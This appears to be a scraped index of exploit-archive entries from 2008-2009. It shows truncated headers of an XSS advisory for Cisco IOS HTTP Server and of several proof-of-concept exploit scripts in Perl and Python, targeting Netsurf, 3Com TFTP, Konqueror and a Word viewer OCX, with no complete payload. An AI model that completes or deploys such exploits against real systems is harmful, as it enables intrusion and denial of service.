PR08-19: XSS on Cisco IOS HTTP ServerDate found: 1st August 2008Vendor contacted: 1st August 2008Advisory publicly released: 14th January 2009Severity: MediumCredits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)Description:Cisco IOS HTTP ser
#!/usr/bin/perl# netsurf_width_intof2.pl# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# # Program received signal SIGABRT, Aborted.# [Switching to Thread 0xb6d78720 (LWP 28933)]#
#!/usr/bin/python# Buffer Overflow (Long filename) Vulnerability Exploit# This is just a DoS exploiting code# Tested on Windows xp SP2## Requires python and impacket## Coded by Liu Qixu Of NCNIPCimport socketimport syshost = '192.168.1.11'port = 69t
#!/usr/bin/perl # 3com_tftp_bof.pl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Easily owns ancient 3CTftpSvc.zip # JOKE!@#$% OK!@#$% JOKE!@#$% # Now how about a time machine and axx to 3com internal networks! # /JOKE!@#$% OK!@#$%
#!/usr/bin/python# Buffer Overflow (Long transporting mode) Vulnerability Exploit# This is just a DoS exploiting code# Tested on Windows xp SP2## Requires python and impacket## Coded by Liu Qixu Of NCNIPCimport socketimport syshost = '192.168.1.11'p
#!/usr/bin/perl # konq_ifsrc_ml.pl # KDE Konqueror 4.1.3 'iframe src' Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # Program received signal SIGSEGV, Segmentation fault. # [Switching to Thread 0xb60008d0 (LWP 14
#!/usr/bin/perl # konq_lhref_ml.pl # KDE Konqueror 4.1.3 'link href' Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # Software should be able to handle any kind of input and still perform correct operations. # Web
HTML ---------------------------------------------------------- br Word viewer OCX V 3.2 Remote File execution exploitbr ---------------------------------------------------------- br -----------------------------------br # By Mountassif Moad a.k.a St